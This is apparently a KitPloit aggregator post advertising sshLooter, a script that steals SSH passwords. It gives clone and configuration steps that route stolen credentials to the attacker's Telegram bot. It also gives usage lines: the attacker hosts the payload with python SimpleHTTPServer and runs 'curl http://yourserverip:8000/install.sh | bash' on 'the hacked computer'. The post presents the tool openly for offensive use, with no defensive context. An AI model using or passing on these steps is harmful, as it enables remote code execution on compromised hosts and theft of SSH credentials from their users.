Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all articles
Browse latest Browse all 5816

sshLooter - Script To Steal Passwords From SSH

$
0
0

Script to steal passwords from SSH.

Install
git clone https://github.com/mthbernardes/sshLooter.git
cd sshLooter

Configuration
Edit the script on install.sh, and add your telegram bot api, and your userid.
Call the @botfather on telegram to create a bot and call the @userinfobot to get your user id.

Usage
On your server execute.
python -m SimpleHTTPServer

On the hacked computer execute.
curl http://yourserverip:8000/install.sh | bash

Original script from
ChokePoint

Post about this script
Stealing SSH credentials Another Approach.



Viewing all articles
Browse latest Browse all 5816

Trending Articles